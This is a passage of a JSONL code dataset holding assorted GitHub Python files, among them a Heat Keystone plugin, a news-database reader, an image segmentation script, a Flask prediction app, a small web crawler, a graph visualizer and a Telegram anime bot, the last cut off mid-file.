project_list:\n if project_obj.name == project:\n return project_obj.id\n\n raise exceptions.KeystoneProjectNotFound(project_id=project)\n\n def get_domain_id(self, domain):\n try:\n domain_obj = self.client().client.domains.get(domain)\n return domain_obj.id\n except keystone_exceptions.NotFound:\n domain_list = self.client().client.domains.list(name=domain)\n for domain_obj in domain_list:\n if domain_obj.name == domain:\n return domain_obj.id\n\n raise exceptions.KeystoneDomainNotFound(domain_id=domain)\n\n def get_group_id(self, group):\n try:\n group_obj = self.client().client.groups.get(group)\n return group_obj.id\n except keystone_exceptions.NotFound:\n group_list = self.client().client.groups.list(name=group)\n for group_obj in group_list:\n if group_obj.name == group:\n return group_obj.id\n\n raise exceptions.KeystoneGroupNotFound(group_id=group)\n\n\nclass KeystoneRoleConstraint(constraints.BaseCustomConstraint):\n\n expected_exceptions = (exceptions.KeystoneRoleNotFound,)\n\n def validate_with_client(self, client, role):\n client.client_plugin('keystone').get_role_id(role)\n\n\nclass KeystoneDomainConstraint(constraints.BaseCustomConstraint):\n\n expected_exceptions = (exceptions.KeystoneDomainNotFound,)\n\n def validate_with_client(self, client, domain):\n client.client_plugin('keystone').get_domain_id(domain)\n\n\nclass KeystoneProjectConstraint(constraints.BaseCustomConstraint):\n\n expected_exceptions = (exceptions.KeystoneProjectNotFound,)\n\n def validate_with_client(self, client, project):\n client.client_plugin('keystone').get_project_id(project)\n\n\nclass KeystoneGroupConstraint(constraints.BaseCustomConstraint):\n\n expected_exceptions = (exceptions.KeystoneGroupNotFound,)\n\n def validate_with_client(self, client, group):\n client.client_plugin('keystone').get_group_id(group)\n","repo_name":"chiehchu/heat","sub_path":"contrib/heat_keystone/heat_keystone/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"26487825342","text":"from agents import *\nfrom game import Myretuen, Controller\n\nn = 5\nfruits = True\nplayerStarts = True\nminmax = True\n\nif playerStarts:\n env = Myretuen(color1='blue', color2='yellow', fruits=fruits)\n Controller(env=env, agent1=Opponent(PlayerAgent()), agent2=NNAgent(minmax=minmax).loadModel('2200ELOFRUIT' if env.splitvariant else '2512ELO')).run(NGames=n)\nelse:\n env = Myretuen(color1='red', color2='green', fruits=fruits)\n Controller(env=env, agent1=Opponent(NNAgent(minmax=minmax).loadModel('2200ELOFRUIT' if env.splitvariant else '2512ELO')), agent2=PlayerAgent()).run(NGames=n)\n","repo_name":"FredslundMagnus/Myretuen","sub_path":"battle.py","file_name":"battle.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33133822726","text":"import sqlite3\nimport matplotlib.pyplot as plt\n\nfrom collections import defaultdict\nfrom tabulate import tabulate\nfrom scraping.extensions import comments_parser\n\nlast_sunday = '2023-03-19'\n\n\ndef plot_week_topics_division(curr):\n curr.execute(\"\"\"\n SELECT subject, COUNT(*) AS count, ()\n FROM articles\n WHERE date >= Date(?)\n GROUP BY subject\n \"\"\", (last_sunday,))\n results = curr.fetchall()\n print(results)\n for tup in results:\n print(tup[0], \" \", tup[1])\n # Plot pie chart:\n # labels = [tup[0][::-1] for tup in results]\n # sizes = [tup[1] for tup in results]\n # fig, ax = plt.subplots()\n # ax.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90)\n # ax.set_title('Distribution of subjects')\n # plt.show()\n\n\ndef get_comments_avg(curr):\n avg1 = curr.execute(\"\"\"SELECT AVG(comments) \n FROM articles \n WHERE source='Ynet' AND date >= Date(?)\"\"\"\n , (last_sunday,))\n print(\"Ynet comments average: \", avg1.fetchall())\n avg2 = curr.execute(\"\"\"SELECT AVG(comments) \n FROM articles \n WHERE source='N12' AND date >= Date(?)\"\"\"\n , (last_sunday,))\n print(\"N12 comments average: \", avg2.fetchall())\n\n\ndef get_top_commented_titles(curr, limit):\n curr.execute(\"\"\"\n SELECT title, date, comments, tags \n FROM articles \n WHERE date >= Date(?)\n ORDER BY comments DESC \n LIMIT ?\"\"\", (last_sunday, limit,))\n results = curr.fetchall()\n print(tabulate(results, headers=['Title', 'Date', 'Comments']))\n # Plot tags from popular articles chart:\n # tags_count = defaultdict(int) todo\n\n\ndef get_week_tags_count(curr):\n curr.execute(\"\"\"SELECT tag, COUNT(*) AS count\n FROM tags\n WHERE date >= DATE(?)\n GROUP BY tag\n ORDER BY count DESC\"\"\", (last_sunday,))\n results = curr.fetchall()\n # Plot MOST used tags from Ynet articles chart:\n filtered_res = [tup for tup in results if tup[1] > 5 and tup[0] != 'המהפכה המשפטית']\n tags = [tup[0][::-1] for tup in filtered_res]\n counts = [tup[1] for tup in filtered_res]\n plt.bar(tags, counts)\n plt.xlabel('Tags')\n plt.ylabel('Count')\n plt.title('Top used tags in ynet')\n plt.xticks(rotation=40)\n plt.show()\n # Print LEAST used tags from Ynet articles\n least_used = [tup[0] for tup in results if tup[1] <= 4]\n print(least_used)\n\n\ndef get_period_tags_count(curr):\n curr.execute(\"\"\"\n SELECT P.week, P.tag, p.amount\n FROM (SELECT tag, week, count(*) as amount\n FROM (SELECT tag, strftime('%W',date) week \n FROM tags) \n WHERE tag NOT IN ('0', '1')\n group by tag, week) as P\n \n JOIN \n \n (SELECT tag, count(*) as amount\n FROM (SELECT tag, strftime('%W',date) week \n FROM tags AS t)\n WHERE week = strftime('%W',DATE('now')) \n group by tag\n order by amount desc\n limit 5) as filter on P.tag = filter.tag\n order by P.week, P.tag \n \"\"\")\n results = curr.fetchall()\n print(results)\n # Plot line chart:\n lines = {}\n for result in results:\n if lines.get(result[1][::-1]) is None:\n lines[result[1][::-1]] = []\n lines[result[1][::-1]].append((int(result[0]), result[2]))\n for line_name, line_data in lines.items(): # Plot each line\n line_data = sorted(line_data, key=lambda x: x[0]) # Sort the data by week\n x_axis, y_axis = zip(*line_data) # extract x and y values from the tuples\n plt.plot(x_axis, y_axis, label=line_name) # plot the line and add a label\n plt.legend()\n plt.title('Top used tags in ynet over the weeks')\n plt.xlabel('week')\n plt.ylabel('count')\n plt.show()\n\n\ndef get_comments_data(curr, num1, num2):\n # 5 most liked comments\n curr.execute(\"\"\"SELECT * FROM ynet_comments \n INNER JOIN articles\n ON ynet_comments.article_title = articles.title\n WHERE articles.date >= DATE(?)\n ORDER BY likes DESC LIMIT ?\"\"\", (last_sunday, num1,))\n results = curr.fetchall()\n for tup in results:\n print(tup[1])\n print(tup[2])\n print(tup[3])\n print(tup[4])\n print(tup[5])\n print(\"------------------\")\n # most common words in comments\n # comments_parser.parse(curr, num2)\n\n\ndef run():\n conn = sqlite3.connect('news.db')\n curr = conn.cursor()\n # plot_week_topics_division(curr)\n # get_comments_avg(curr)\n # get_top_commented_titles(curr, 10)\n # get_week_tags_count(curr)\n # get_period_tags_count(curr)\n get_comments_data(curr, 5, 5)\n conn.close()\n","repo_name":"mayabyle/Public-Interest-Scraper","sub_path":"scraping/extensions/db_reader.py","file_name":"db_reader.py","file_ext":"py","file_size_in_byte":5065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26048177205","text":"# 放在data文件夹同目录下~\n\nimport cv2, os, numpy as np, random\n\ndef cal(x, y):\n return ((x[0]-y[0])**2 + (x[1]-y[1])**2 + (x[2]-y[2])**2) ** (1/2)\n\ndef find(fa, k):\n if fa[k] != k:\n fa[k] = find(fa, fa[k])\n return fa[k]\n\ndef getMiddle(index, p):\n n, m = p.shape[:2]\n middleImage, l, s = np.zeros((n, m, 3), dtype=np.uint32), [], []\n for i in range(n):\n for j in range(m):\n if p[i, j] not in l: l.append(p[i, j])\n for i in range(len(l)):\n s.append((random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)))\n for i in range(n):\n for j in range(m):\n middleImage[i, j, :] = s[l.index(p[i, j])]\n cv2.imwrite('data/segmentationOut/' + index + '_middle.png', middleImage.astype(np.float64))\n \ndef test(index, k):\n # 初始化\n inImage = cv2.imread('data/imgs/' + index + '.png').astype(np.float64)\n mask = cv2.imread('data/gt/' + index + '.png', 0).astype(np.uint32)\n if not os.path.exists('data/segmentationOut'): os.mkdir('data/segmentationOut')\n n, m = inImage.shape[:2]\n fa, size, threshold = np.zeros(n*m, dtype=np.uint32), np.zeros(n*m, dtype=np.uint32), np.zeros(n*m, dtype=np.float)\n for i in range(n*m):\n fa[i], size[i], threshold[i] = i, 1, k\n # 分割区域\n lis = []\n for i in range(n):\n for j in range(m-1):\n lis.append((i, j, i, j+1, cal(inImage[i, j], inImage[i, j+1])))\n for i in range(n-1):\n for j in range(m):\n lis.append((i, j, i+1, j, cal(inImage[i, j], inImage[i+1, j])))\n lis.sort(key=lambda edge: edge[4])\n for edge in lis:\n a, b = find(fa, edge[0]*m+edge[1]), find(fa, edge[2]*m+edge[3])\n if a != b and edge[4] <= threshold[a] and edge[4] <= threshold[b]:\n fa[b] = a\n size[a] += size[b]\n threshold[a] = edge[4] + k/size[a]\n # 合并<50的区域\n for edge in lis:\n a, b = find(fa, edge[0]*m+edge[1]), find(fa, edge[2]*m+edge[3])\n if a != b and (size[a] < 50 or size[b] < 50):\n fa[b] = a\n size[a] += size[b]\n # 区域标号\n p, l = np.zeros((n, m), dtype=np.uint32), []\n for i in range(n):\n for j in range(m):\n p[i, j] = find(fa, i*m+j)\n if p[i, j] not in l: l.append(p[i, j])\n getMiddle(index, p)\n # 判断区域是否为前景/背景\n l1, l2, l3 = [0] * len(l), [0] * len(l), [0] * len(l)\n for i in range(n):\n for j in range(m):\n if mask[i, j] == 255: l1[l.index(p[i, j])] += 1\n else: l2[l.index(p[i, j])] += 1\n for i in range(len(l)):\n if l1[i]+l2[i] > 0 and l1[i] / (l1[i]+l2[i]) >= 0.5: l3[i] = 255\n else: l3[i] = 0\n # 计算IOU\n a, b, c = 0, 0, 0\n for i in range(n):\n for j in range(m):\n p[i, j] = l3[l.index(p[i, j])]\n if p[i, j] == 255 and mask[i, j] == 255: c += 1\n elif p[i, j] == 255: a += 1\n elif mask[i, j] == 255: b += 1\n return p, len(l), c/(a+b+c)\n\ndef segment(index):\n k = 500\n p, l, IOU = test(index, k)\n while l < 50 or l > 70:\n if l > 70: k += 50\n else: k -= 50\n p, l, IOU = test(index, k)\n cv2.imwrite('data/segmentationOut/' + index + '.png', p.astype(np.float64))\n mask = cv2.imread('data/gt/' + index + '.png', 0).astype(np.uint32)\n cv2.imwrite('data/segmentationOut/' + index + '_mask.png', mask.astype(np.float64))\n print(l, k, IOU)\n\nsegment('46')\nsegment('146')\nsegment('246')\nsegment('346')\nsegment('446')\nsegment('546')\nsegment('646')\nsegment('746')\nsegment('846')\nsegment('946')","repo_name":"SongYJ9/SYSU","sub_path":"study/计算机视觉实验/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"2011553086","text":"from flask import Flask, render_template\nimport pandas as pd\nimport pickle\nimport os \nimport numpy as np\n\n\napp = Flask(__name__)\n\n# Get the path to the models folder\nmodels_folder = \"../models/\"\n\n# Get the path to the models folder\ndata_folder = \"../data/\"\n\n# Load the pickled regression model\nwith open(os.path.join(models_folder, 'xgb_reg.pkl'), 'rb') as f:\n reg_model = pickle.load(f)\n\n# Load the pickled classification model\nwith open(os.path.join(models_folder, 'xgb_clf.pkl'), 'rb') as f:\n clf_model = pickle.load(f)\n\n# Load the data\ndata = pd.read_csv(os.path.join(data_folder, 'scenario_1_test_data.csv'), index_col=0).reset_index(drop=True)\n\n# Defining predictor columns\npredictors = ['popular_day_Friday', 'popular_day_Monday', 'popular_day_Saturday',\n 'popular_day_Sunday', 'popular_day_Thursday', 'popular_day_Tuesday',\n 'popular_day_Wednesday', 'cluster_Cluster 0', 'cluster_Cluster 1',\n 'cluster_Cluster 2', 'cluster_Cluster 3', 'cluster_Noise',\n 'cluster_2_Cluster 0', 'cluster_2_Cluster 1', 'cluster_2_Cluster 2',\n 'cluster_2_Cluster 3', 'cluster_2_Cluster 4', 'cluster_2_Noise',\n 'phone_brand', 'device_model', 'number_of_events', 'popular_hour',\n 'median_lat', 'median_long', 'total_apps_installed',\n 'total_apps_active', 'n_categories', 'avg_events_hour',\n 'popular_category', 'avg_events_day', 'percentage_of_active_apps']\n\n# Define a route to display the predictions\n@app.route('/')\ndef home():\n # Make predictions\n gender_pred = clf_model.predict_proba(data[predictors])[:, 1]\n age_pred = reg_model.predict(data[predictors])\n \n # Create a table of the predictions\n table = pd.DataFrame({'Gender_prob': pd.Series([round(i, 2) for i in gender_pred]),\n 'Age': pd.Series([round(i) for i in age_pred])})\n\n #Ordering probabilities to obtain deciles\n sorted_probs = np.sort(table['Gender_prob'])\n\n # Find the 10th, 20th, 30th, and so on percentiles to divide the sorted probabilities into deciles\n decile_cutoffs = np.percentile(sorted_probs, np.arange(10, 101, 10))\n\n # Map the probabilities to class labels based on the deciles\n table['Gender'] = \"Undefined (deciles 4, 5 and 6)\"\n \n # -3 position will be the 8th decile, so each value higher than that one will be MALE\n table.loc[table['Gender_prob'] >= decile_cutoffs[-3], 'Gender'] = \"Male\"\n\n # 2 position will be the 3th decile so each value lower than that will be Female\n table.loc[table['Gender_prob'] <= decile_cutoffs[2], 'Gender'] = \"Female\"\n\n #Ordering\n table = table[[\"Gender_prob\", \"Gender\", \"Age\"]]\n\n #Mapping campaigns\n table[\"Gender Based Campaing\"] = \"None\"\n\n table.loc[table[\"Gender\"] == \"Female\", \"Gender Based Campaing\"] = \"Campaign 1 - Campaing 2\"\n table.loc[table[\"Gender\"] == \"Male\", \"Gender Based Campaing\"] = \"Campaign 3\"\n\n\n table[\"Age Based Campaing\"] = \"None\"\n\n table.loc[table[\"Age\"].isin(np.arange(0,25,1)), \"Age Based Campaing\"] = \"Campaing 4\"\n table.loc[table[\"Age\"].isin(np.arange(25,33,1)), \"Age Based Campaing\"] = \"Campaing 5\"\n table.loc[table[\"Age\"] >= 32, \"Age Based Campaing\"] = \"Campaing 6\"\n\n\n table = pd.concat([data[[\"device_id\"]], table], axis=1)\n \n\n # Creating 50 sample devices to show in the flask app\n sample_50 = table.sample(50).reset_index(drop=True)\n\n # Render the template with the table\n return render_template('table.html', table=sample_50.to_html(index=True))\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=8000)\n\n","repo_name":"pjpCoding/FlaskApp","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17062243047","text":"while True:\n try:\n height = int(input('Please the your height in cm: '))\n weight = int(input('Please you weight in kg: '))\n print(f'your BMI is {weight / (height/100) ^ 2}')\n except:\n print('Please enter a valid number')\n else:\n print('thankyou!')\n break","repo_name":"MAyazMHaque/ZTM_Python_Exersices","sub_path":"error-handling.py","file_name":"error-handling.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73115364568","text":"#!/usr/bin/python3\n\n\"\"\"\n实现判断一个数是不是回文数的函数\n\nversion: 0.1\nauthor: icro\n\"\"\"\n\n\ndef is_palindrome(num):\n temp = num\n total = 0\n while temp > 0:\n total = total * 10 + temp % 10\n temp //= 10\n return total == num\n\n\nif __name__ == \"__main__\":\n num = int(input(\"num = \"))\n print(is_palindrome(num))\n","repo_name":"linlicro/python100","sub_path":"day06/t02.py","file_name":"t02.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12913501693","text":"# -*- coding: utf-8 -*-\n# filename: crawler.py\n\nimport urllib2\n\nfrom bs4 import BeautifulSoup\nfrom urlparse import urlparse\n\n\nclass Crawler(object):\n def __init__(self, depth=2):\n \"\"\"\n depth: how many time it will bounce from page one (optional)\n \"\"\"\n self.depth = depth\n self.domain = ''\n self.msg_ids = {}\n self.visited = []\n\n def crawl(self, url):\n \"\"\"\n url: where we start crawling, should be a complete URL like\n 'http://www.intel.com/news/'\n \"\"\"\n parse_result = urlparse(url)\n self.domain = parse_result.netloc\n self.scheme = parse_result.scheme\n self._crawl([url], self.depth)\n\n def _crawl(self, urls, max_depth):\n n_urls = set()\n if max_depth:\n for url in urls:\n # do not crawl twice the same page\n if url not in self.visited:\n n_urls = n_urls.union(self.get_links(url))\n self._crawl(n_urls, max_depth-1)\n\n def get_page(self, url):\n \"\"\"\n return content at url.\n return empty string if response raise an HTTPError (not found, 500...)\n \"\"\"\n try:\n print(\"retrieving url... {}\".format(url))\n data = urllib2.urlopen(url)\n return BeautifulSoup(data.read(), \"html.parser\")\n except Exception as e:\n print(\"error {}: {}\".format(url, e))\n return None\n\n def get_links(self, url):\n \"\"\"\n Read through HTML content and returns a tuple of links\n internal to the given domain\n \"\"\"\n page = self.get_page(url)\n a_tags = page.find_all('a')\n urls = set()\n for a_tag in a_tags:\n try:\n href = a_tag['href']\n if href.startswith('/'):\n url = \"{}://{}{}\".format(self.scheme, self.domain, href)\n elif href.startswith(self.domain):\n url = href\n if url not in self.visited:\n urls.add(url)\n except KeyError:\n pass # no href found on a-tag\n\n return urls\n\n\n","repo_name":"ceasaro/django-l10n-extensions","sub_path":"src/crawler_src/crawler_impl.py","file_name":"crawler_impl.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"26671950545","text":"\"\"\"\nIngest and parse WZDx feed data to Work Zone Data Sandbox.\n\n\"\"\"\nimport json\nimport logging\nimport os\nimport traceback\n\nfrom wzdx_sandbox.wzdx_sandbox import WorkZoneSandbox\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO) # necessary to make sure aws is logging\n\nBUCKET = os.environ.get('BUCKET')\n\nif None in [BUCKET]:\n logger.error('Required ENV variable(s) not found. Please make sure you have specified the following ENV variables: BUCKET')\n exit()\n\n\ndef lambda_handler(event=None, context=None):\n \"\"\"AWS Lambda handler. \"\"\"\n try:\n wzdx_sandbox = WorkZoneSandbox(feed=event['feed'], bucket=BUCKET, logger=logger)\n datastream = wzdx_sandbox.s3helper.get_data_stream(event['bucket'], event['key'])\n wzdx_sandbox.ingest(data=datastream._raw_stream.data.decode('utf-8'))\n except:\n print(traceback.format_exc())\n print(event)\n raise\n\nif __name__ == '__main__':\n lambda_handler()\n","repo_name":"usdot-its-jpo-data-portal/wzdx_sandbox","sub_path":"lambda__wzdx_ingest_to_lake.py","file_name":"lambda__wzdx_ingest_to_lake.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13921490425","text":"\"\"\"Visualize the graph (represented as a set of triplets) using pyvis.\nThe visualized subgraphs are html files.\n\"\"\"\nimport os\nimport argparse\nimport json\nfrom pathlib import Path\n\nimport srsly\nfrom pyvis.network import Network\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup as Soup\n\nfrom .knowledge_graph import KnowledgeGraphBase, get_knowledge_graph\n\n\n__DESCRIPTION__ = \"\"\"Visualize the graph (represented as a set of triplets) using pyvis.\nIt expects the input to be a JSONL file, where each line contains fields id, triplets, \nquestion, answer, question_entities, answer_entities. Their meanings are as follows:\n- id: the id of the sample. the output will be named as [id].html\n- triplets (list[list[str]]): a list of triplets, where each triplet is a list of three strings: subject, relation, object\n- question (str): the question. it will be shown in backgraound\n- answer (str, optional): the answer. it will be shown in backgraound\n- question_entities (list[str], optional): a list of entity identifiers. they will be highlighted in blue.\n- answer_entities (list[str], optional): a list of entity identifiers. they will be highlighted in green.\n\"\"\"\n\ndef visualize_subgraph(sample, kg: KnowledgeGraphBase):\n \"\"\"Visualize the subgraph. It returns an html string.\n \"\"\"\n net = Network(directed=True, font_color='#000000')\n net.barnes_hut()\n question_entities = sample['question_entities'] if 'question_entities' in sample else []\n answer_entities = sample['answer_entities'] if 'answer_entities' in sample else []\n # Add question entities even if they are not in the triplets\n for entity in question_entities:\n net.add_node(entity, label=kg.get_label(entity), color='#114B7A')\n for triplet in sample['triplets']:\n subject, relation, obj = triplet\n subject_label = kg.get_label(subject)\n subject_options = {'color':'#114B7A'} if subject in question_entities else {}\n obj_label = kg.get_label(obj)\n obj_options = {'color':'#1B5E20'} if obj in answer_entities else {}\n relation_label = kg.get_label(relation)\n net.add_node(subject, label=subject_label, **subject_options)\n net.add_node(obj, label=obj_label, **obj_options)\n net.add_edge(subject, obj, label=relation_label)\n\n net_options = {\n 'shape': 'dot',\n 'font': {\n 'size': '1em',\n 'face': 'fontFace',\n 'strokeColor': '#fff',\n 'strokeWidth': 5\n },\n 'size': '1.5em',\n }\n net.set_options(json.dumps(net_options))\n return net.generate_html(notebook=False)\n\n\ndef add_text_to_html(html, text):\n soup = Soup(html, 'html.parser')\n style_tag = soup.new_tag('style')\n style_tag.string = '''\n .background-text {\n position: absolute;\n z-index: 1;\n top: 0;\n left: 0;\n font-size: 2em;\n color: #ccc;\n }\n '''\n soup.head.append(style_tag)\n p_tag = soup.new_tag('p', attrs={'class': 'background-text'}, style=\"white-space:pre-wrap\")\n p_tag.string = text\n soup.body.append(p_tag)\n return soup.prettify()\n \n\ndef visualize(args):\n \"\"\"Main entry for subgraph visualization.\n\n Args:\n args (Namespace): arguments for subgraph visualization.\n \"\"\"\n knowledge_graph = get_knowledge_graph(args.knowledge_graph, args.sparql_endpoint)\n samples = srsly.read_jsonl(args.input)\n total = sum(1 for _ in srsly.read_jsonl(args.input))\n total = min(total, args.max_output)\n if not os.path.exists(args.output_dir):\n Path(args.output_dir).mkdir(parents=True, exist_ok=True)\n print(f'Created output directory: {args.output_dir}')\n for i, sample in enumerate(tqdm(samples, desc='Visualizing graphs', total=total)):\n if i >= args.max_output:\n break\n html = visualize_subgraph(sample, knowledge_graph)\n text_to_append = f\"Question: {sample['question']}\"\n if 'answer' in sample:\n text_to_append += f\"\\n Answer: {sample['answer']}\"\n html = add_text_to_html(html, text_to_append)\n output_path = os.path.join(args.output_dir, sample['id'] + '.html')\n with open(output_path, 'w', encoding='utf-8') as fout:\n fout.write(html)\n print(f'Visualized graphs outputted to {args.output_dir}.')\n\n\ndef _add_arguments(parser):\n parser.description = __DESCRIPTION__\n parser.add_argument('-i', '--input', required=True, help='The input subgraph file path.')\n parser.add_argument('-o', '--output-dir', required=True, help='The output directory path.')\n parser.add_argument('-e', '--sparql-endpoint', type=str, default='http://localhost:1234/api/endpoint/sparql',\n help='SPARQL endpoint for Wikidata or Freebase services. In this step, it is used to get the labels of entities.\\\n (Default: http://localhost:1234/api/endpoint/sparql)')\n parser.add_argument('-kg', '--knowledge-graph', type=str, choices=('wikidata', 'freebase', 'dbpedia'), default='wikidata',\n help='The knowledge graph type to use. (Default: wikidata)')\n parser.add_argument('--max-output', type=int, default=1000,\n help='The maximum number of graphs to output. This is useful for debugging. (Default: 1000)')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n _add_arguments(parser)\n args = parser.parse_args()\n visualize(args)\n","repo_name":"happen2me/subgraph-retrieval-toolkit","sub_path":"src/srtk/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"12336905573","text":"'''\n# 국영수\n\n- sorted() 의 key 속성을 이용하면 된다.\n'''\nstu_no = int(input())\nstudents = []\n\nfor no in range(stu_no):\n [name, k, e, m] = input().split()\n # 모두 str type이라서 형변환을 해야 정렬이 가능하다.\n students.append([name, int(k), int(e), int(m)])\n\n# key를 중심으로 값이 정렬된다.\n# 양수라면 오름차순, 음수라면 내림차순으로 정렬된다.\n# 중복되는 값이 존재한다면 뒤의 조건에 맞게 정렬한다. \n # 예를 들면 -x[1]에서 중복된다면 x[2]에 맞게..\nsorted_stu = sorted(students, key=lambda x: (-x[1], x[2], -x[3], x[0]))\n\nfor student in sorted_stu:\n print(student[0])\n","repo_name":"Yejin-Ha/Coding-Test","sub_path":"BAEKJOON/10825_국영수.py","file_name":"10825_국영수.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"41033072373","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 9 19:12:54 2020\n\n@author: meixiangui\n\"\"\"\n\nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\n\n# load data \nsales = pd.read_excel(\"Go.com_Assignment_Data.xlsx\", header = 4,usecols = [1,2,3])\nrevenue = pd.read_excel(\"Go.com_Assignment_Data.xlsx\", \"Historical Data\", \n header = 5, skipfooter = 7, \n usecols = [1,2,3,4,5,6], index_col = 0)\nrevenue = revenue.drop(revenue.index[0])\n\nprofit = pd.read_excel(\"Go.com_Assignment_Data.xlsx\", \"Historical Data\", \n header = 13,\n usecols = [1,2,3,4,5,6], index_col = 0)\nprofit.columns = revenue.columns\n\n# calculate the revenue for different firm in 2015 Q1\nrev_q1 = sales.groupby('Product Line').Revenue.sum()\nrevenue['Q1 2015'] = rev_q1\nrevenue.loc['Total','Q1 2015'] = sum(revenue['Q1 2015'][0:3])\n\n# calculate the profit for different firm in 2015 Q1\nmul = revenue['Q1 2014'] / profit['Q1 2014']\n\nprofit['Q1 2015'] = None\nprofit['Q1 2015'].iloc[0] = revenue['Q1 2015'].iloc[0]/mul.iloc[0]\nprofit['Q1 2015'].iloc[1] = revenue['Q1 2015'].iloc[1]/mul.iloc[1]\nprofit['Q1 2015'].iloc[2] = revenue['Q1 2015'].iloc[2]/mul.iloc[2]\nprofit.loc['Total','Q1 2015'] = sum(profit['Q1 2015'][0:3])\n\ngrowth = profit.loc['Total','Q1 2015'] / profit.loc['Total','Q4 2014'] - 1\n\n# plot the trend \nfor i in range(4):\n plt.plot(profit['Q4 2013'].iloc[i],profit['Q1 2014'].iloc[i],profit['Q2 2014'].iloc[i], \n profit['Q3 2014'].iloc[i], linestyle='--')\n \n\n\n\n\n\n\n\n","repo_name":"jasmine503/Interviews","sub_path":"go.com.data.py","file_name":"go.com.data.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"174837306","text":"import random\n\nfrom mal import AnimeSearch, Anime\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\nfrom telegram.ext import CallbackContext\nimport telebot\nimport json\nfrom genre import *\n\n\n# search function after random anime is generated\ndef animesearch(query):\n handle_info(query, False)\n\n\ndef animeinfo(update, context):\n anime = str(update.message.text)[6:]\n search = AnimeSearch(anime).results\n title = str(Anime(search[0].mal_id).title_english)\n\n keyboard = [\n [InlineKeyboardButton(title + ' image', callback_data=title + ' image')],\n [InlineKeyboardButton(title + ' synopsis', callback_data=title + ' synopsis')],\n [InlineKeyboardButton(title + ' rank', callback_data=title + ' rank')],\n [InlineKeyboardButton(title + ' duration', callback_data=title + ' duration')],\n [InlineKeyboardButton(title + ' air date', callback_data=title + ' air date')],\n [InlineKeyboardButton(title + ' status', callback_data=title + ' status')],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.message.reply_text(anime, reply_markup=reply_markup)\n\n\ndef animekeyboard(update, context: CallbackContext) -> None:\n keyboard = [\n [\n InlineKeyboardButton(\"Anime\", callback_data='1'),\n InlineKeyboardButton(\"Manga\", callback_data='2'),\n ],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.message.reply_text('Please choose:', reply_markup=reply_markup)\n\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Use /start to test this bot.\")\n\n\ndef button(update: Update, context: CallbackContext) -> None:\n query = update.callback_query\n\n # CallbackQueries need to be answered, even if no notification to the user is needed\n # Some clients may have trouble otherwise. See https://core.telegram.org/bots/api#callbackquery\n query.answer()\n if query.data == 'searchanime':\n context.bot.send_message(chat_id=update.effective_chat.id,\n text='Use the keyword search followed by the anime name')\n elif query.data[-4:] == 'info':\n handle_info(query, True)\n elif query.data[-8:] == 'synopsis':\n synopsis_command(query.data[:-9], query)\n # website = search[0].url\n # context.bot.send_message(chat_id=update.effective_chat.id, text='No anime found')\n\n elif query.data[-5:] == 'image':\n image_command(query.data[:-6], query)\n\n elif query.data[-4:] == 'rank':\n rank_command(query.data[:-5], query)\n\n elif query.data[-8:] == 'duration':\n duration_command(query.data[:-9], query)\n\n elif query.data[-8:] == 'air date':\n air_date_command(query.data[:-9], query)\n\n elif query.data[-6:] == 'status':\n status_command(query.data[:-7], query)\n elif query.data == 'getrecommendations' or query.data == 'donotlike' or query.data == 'dislike':\n query.edit_message_text(text='Which genre do you like?', reply_markup=animegenres())\n # context.bot.send_message(chat_id=update.effective_chat.id, text='You should watch Naruto')\n elif 'genre' in query.data:\n # slicedgenre = query.data.replace('genre', '').lower()\n # value = random.choice(list(eval(slicedgenre).values()))\n animesearch(query)\n # context.bot.send_message(chat_id=update.effective_chat.id, text=str(value))\n else:\n keyboard = [\n [InlineKeyboardButton('info', callback_data=query.data + ' info')],\n [InlineKeyboardButton('genre', callback_data=query.data + ' genre')],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n query.edit_message_text(text='Choose one: ', reply_markup=reply_markup)\n\n\ndef start(update: Update, context: CallbackContext) -> None:\n keyboard = [\n [\n InlineKeyboardButton(\"Search Anime\", callback_data='searchanime'),\n InlineKeyboardButton(\"Recommend Anime\", callback_data='getrecommendations'),\n ]\n ]\n\n reply_markup = 